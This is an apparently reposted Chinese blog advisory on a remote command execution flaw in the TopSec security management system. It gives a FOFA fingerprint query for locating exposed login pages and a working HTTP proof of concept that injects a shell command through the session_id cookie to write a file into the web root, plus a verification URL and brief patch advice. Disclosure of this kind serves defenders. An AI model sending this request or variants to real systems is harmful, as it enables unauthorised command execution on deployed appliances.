0


天融信TOPSEC安全管理系统存在远程命令执行漏洞

文章目录

产品简介

天融信TopSec 安全管理系统,是基于大数据架构,采用多种技术手段收集各类探针设备安全数据,围绕资产、漏洞、攻击、威胁等安全要素进行全面分析,提供统一监测告警、集中策略管控、协同处置流程,实现客户等保合规、资产统一管理、风险一键阻断等。

漏洞概述

安全管理系统存在存在远程命令执行漏洞,通过此漏洞,攻击者可进行文件写入等危险操作,威胁系统安全。

指纹识别

fofa:

title="Web User Login"&& body="/cgi/maincgi.cgi?Url=VerifyCode"

在这里插入图片描述

漏洞利用

poc:

GET /cgi/maincgi.cgi?Url=check HTTP/1.1
Host:10
User-Agent: Mozilla/5.0(Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Cookie: session_id_443=1|echo 'hhh'>>/www/htdocs/site/image/hhh.txt;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Dnt:1
Upgrade-Insecure-Requests:1
Connection: close

在这里插入图片描述
验证url:

https://you_ip/site/image/hhh.txt

在这里插入图片描述

修复建议

联系软件厂商更新至最新安全版本

【陆上行舟。】


本文转载自: https://blog.csdn.net/luochen2436/article/details/135341423
版权归原作者 3tefanie丶zhou 所有, 如有侵权,请联系我们删除。

“天融信TOPSEC安全管理系统存在远程命令执行漏洞”的评论:

还没有评论